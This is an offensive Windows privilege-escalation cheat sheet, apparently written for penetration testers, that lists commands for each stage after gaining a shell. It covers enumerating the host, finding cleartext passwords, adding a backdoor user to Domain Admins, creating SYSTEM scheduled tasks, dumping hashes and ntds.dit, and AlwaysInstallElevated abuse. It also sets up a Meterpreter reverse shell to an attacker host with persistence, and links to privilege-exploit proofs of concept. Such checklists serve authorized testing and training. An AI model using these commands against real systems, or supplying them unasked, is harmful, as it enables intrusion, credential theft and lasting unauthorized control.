Windows Privesc checklist
You have a shell on a Windows Device, now what?
DOMAIN ENUM (if joined)
BloodHound / SharpHoundWho are we? What can we do? Initial Enumeration
WHOAMI?
whoami
echo %username%PRIVILEGES?
whoami /privSYSTEM INFO
systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,VersionSERVICES
wmic service get name,startname
net startADMIN CHECK
net localgroup administrators
net userNETWORK
netstat -anoy
route print
arp -A
ipconfig /allUSERS
net users
net user
net localgroupFIREWALL
netsh advfirewall firewall show rule name=allSCHEDULED TASKS
schtasks /query /fo LIST /v > schtasks.txtINSTALLATION RIGHTS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedPRIVESC CHECKLIST
UNQUOTED SERVICE PATHS
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v '"'WEAK SERVICE PERMISSIONS
accesschk.exe -uwcqv <service>
sc qc <service>
icacls "C:\Path\To\Service.exe"FILE TRANSFER OPTIONS
certutil.exe
powershell (IEX)
SMB / FTP / TFTP / VBScriptCLEAR TEXT CREDENTIALS
findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *.config*WEAK FILE PERMISSIONS
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*NEW ADMIN USER (Local/Domain)
net user bob P@ssw0rd! /add
net localgroup administrators bob /add
net group "Domain Admins" bob /add /domainSCHEDULED TASK ABUSE
ENUM
schtasks /query /fo LIST /v > tasks.txtCREATE SYSTEM TASK
schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\bobMaint.exe"RUN TASK
schtasks /run /tn "RUNME"POST EXPLOIT ENUMERATION
NETWORK USERS
net user
net user <target>
net localgroup administratorsNT AUTHORITY CHECKS
whoami
accesschk.exe /accepteula
MS09-012.exe "whoami"HASH DUMP
meterpreter > hashdumpEXFILTRATE ntds.dit
Use secretsdump.py or disk capture toolsINSTALLER ABUSE
AlwaysInstallElevated = 1
msiexec /i evil.msiSHARE ENUMERATION
net share
net use
net use Z: \\TARGET\SHARE /persistent:yesWINDOWS PRIV ESC: GITHUB EXPLOITS
| Privilege Name | GitHub PoC |
|---|---|
| SeDebugPrivilege | github.com/bruno-1337/SeDebugPrivilege- |
| SeImpersonatePrivilege | github.com/itm4n/PrintSpoofer |
| SeAssignPrimaryToken | github.com/b4rdia/HackTricks |
| SeTcbPrivilege | github.com/hatRiot/token-priv |
| SeCreateTokenPrivilege | github.com/hatRiot/token-priv |
| SeLoadDriverPrivilege | github.com/k4sth4/SeLoadDriverPrivilege |
| SeTakeOwnershipPrivilege | github.com/hatRiot/token-priv |
| SeRestorePrivilege | github.com/xct/SeRestoreAbuse |
| SeBackupPrivilege | github.com/k4sth4/SeBackupPrivilege |
| SeIncreaseQuotaPrivilege | github.com/b4rdia/HackTricks |
| SeSystemEnvironment | github.com/b4rdia/HackTricks |
| SeMachineAccount | github.com/b4rdia/HackTricks |
| SeTrustedCredManAccess | learn.microsoft.com/…trusted-caller |
| SeRelabelPrivilege | github.com/decoder-it/RelabelAbuse |
| SeManageVolumePrivilege | github.com/CsEnox/SeManageVolumeExploit |
| SeCreateGlobalPrivilege | github.com/b4rdia/HackTricks |
Notes:
- PrintSpoofer is gold for SeImpersonatePrivilege.
- SeManageVolume has practical field PoCs.
MAINTAINING ACCESS
METERPRETER REVERSE SHELL SETUP
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploitPERSISTENCE
meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>PORT FORWARDING
meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>SYSTEM MIGRATION
meterpreter > run post/windows/manage/migrate
meterpreter > migrate <PID>EXECUTE PAYLOADS
powershell.exe "C:\Tools\privesc.ps1"RESOURCES
Windows Exploit Suggester (kind of old)
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Windows privesc checker (contemporary)
https://github.com/itm4n/PrivescCheck
Cross Compile Payloads (Linux > Windows)
apt-get install mingw-w64x86:
i686-w64-mingw32-gcc hello.c -o hello.exex64:
x86_64-w64-mingw32-gcc hello.c -o hello64.exeAdditional Reading
https://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation